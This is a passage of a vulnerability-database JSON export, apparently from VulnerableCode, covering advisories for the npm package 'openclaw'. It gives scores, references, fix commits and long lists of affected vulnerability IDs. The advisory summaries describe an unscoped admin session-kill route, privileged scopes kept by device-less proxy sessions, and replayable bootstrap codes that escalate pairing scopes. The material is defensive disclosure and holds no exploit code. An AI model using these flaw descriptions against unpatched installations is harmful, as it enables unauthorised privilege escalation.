b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["GHSA-w85g-3h6x-4xh2"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-38g8-39ek-xbat"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91639?format=json","vulnerability_id":"VCID-3bdd-a9nw-13bn","summary":"OpenClaw: Gateway HTTP /sessions/:sessionKey/kill Reaches Admin Kill Path Without Caller Scope Binding\n## Summary\n\nGateway HTTP /sessions/:sessionKey/kill Reaches Admin Kill Path Without Caller Scope Binding.\n\n## Details\n\nThe HTTP route previously treated any bearer-authenticated request as admin-eligible and could call without binding the action to requester ownership or caller-granted operator scopes. The flaw removes the bearer-token admin fallback and keeps remote session kills on the local-admin or requester-owned path only.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/02cf12371f9353a16455da01cc02e6c4ecfc4152","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/02cf12371f9353a16455da01cc02e6c4ecfc4152"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9p93-7j67-5pc2","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9p93-7j67-5pc2"},{"reference_url":"https://github.com/advisories/GHSA-9p93-7j67-5pc2","reference_id":"GHSA-9p93-7j67-5pc2","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9p93-7j67-5pc2"}],"fixed_packages":[],"aliases":["GHSA-9p93-7j67-5pc2"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3bdd-a9nw-13bn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91121?format=json","vulnerability_id":"VCID-3pqp-bneb-mbc4","summary":"OpenClaw's Trusted-proxy Control UI sessions retain privileged scopes without device identity on device-less allow paths\n## Summary\nTrusted-proxy Control UI sessions without device identity could retain self-declared privileged scopes on the device-less allow path.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `ccf16cd8892402022439346ae1d23352e3707e9e`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/gateway/server/ws-connection/message-handler.ts now strips unbound self-declared scopes on the trusted-proxy no-device path.\n- src/gateway/server/ws-connection/connect-policy.ts remains the allow path, but the shipped scope scrub prevents privilege retention without device identity.\n\nOpenClaw thanks @nexrin for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ccf16cd8892402022439346ae1d23352e3707e9e","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/ccf16cd8892402022439346ae1d23352e3707e9e"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-48vw-m3qc-wr99","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-48vw-m3qc-wr99"},{"reference_url":"https://github.com/advisories/GHSA-48vw-m3qc-wr99","reference_id":"GHSA-48vw-m3qc-wr99","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-48vw-m3qc-wr99"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["GHSA-48vw-m3qc-wr99"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3pqp-bneb-mbc4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91198?format=json","vulnerability_id":"VCID-3qbe-dsde-p7dz","summary":"OpenClaw bootstrap setup codes could be replayed to escalate pending pairing scopes before approval\n### Summary\n`openclaw` versions `<= 2026.3.12` allowed bootstrap setup codes to be replayed before approval, which could widen the scopes on a pending device pairing request.\n\n### Affected Packages / Versions\n- Package: `openclaw` (`npm`)\n- Affected versions: `<= 2026.3.12`\n- Fixed version: `2026.3.13`\n\n### Details\nThe vulnerable path was bootstrap token verification in `src/infra/device-bootstrap.ts`. In affected releases, a valid bootstrap setup code could be verified more than once before the pairing request was approved. That allowed a second verification attempt to mutate a pending device pairing and request broader scopes, including escalation from a lower operator scope to `operator.admin`, before an approver finalized the pairing.\n\nThis issue is in scope under OpenClaw's trust model because bootstrap setup codes are an authentication primitive for device pairing and the replay changed the privileges granted to the pending device.\n\n### Fix\n`openclaw@2026.3.13` makes bootstrap setup codes single-use. Current code consumes the bootstrap token record on the first successful verification, so replay attempts fail before pending scopes can be widened.\n\nRegression coverage exists in `src/infra/device-pairing.test.ts` (`rejects bootstrap token replay before pending scope escalation can be approved`).\n\n### Fix Commit(s)\n- `1803d16d5cec970c54b0e1ac46b31b1cbade335c`\n\nThanks @tdjackey for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/1803d16d5cec970c54b0e1ac46b31b1cbade335c","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/1803d16d5cec970c54b0e1ac46b31b1cbade335c"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-63f5-hhc7-cx6p","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-63f5-hhc7-cx6p"},{"reference_url":"https://github.com/advisories/GHSA-63f5-hhc7-cx6p","reference_id":"GHSA-63f5-hhc7-cx6p","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-63f5-hhc7-cx6p"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113139?format=json","purl":"pkg:npm/openclaw@2026.3.13","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-r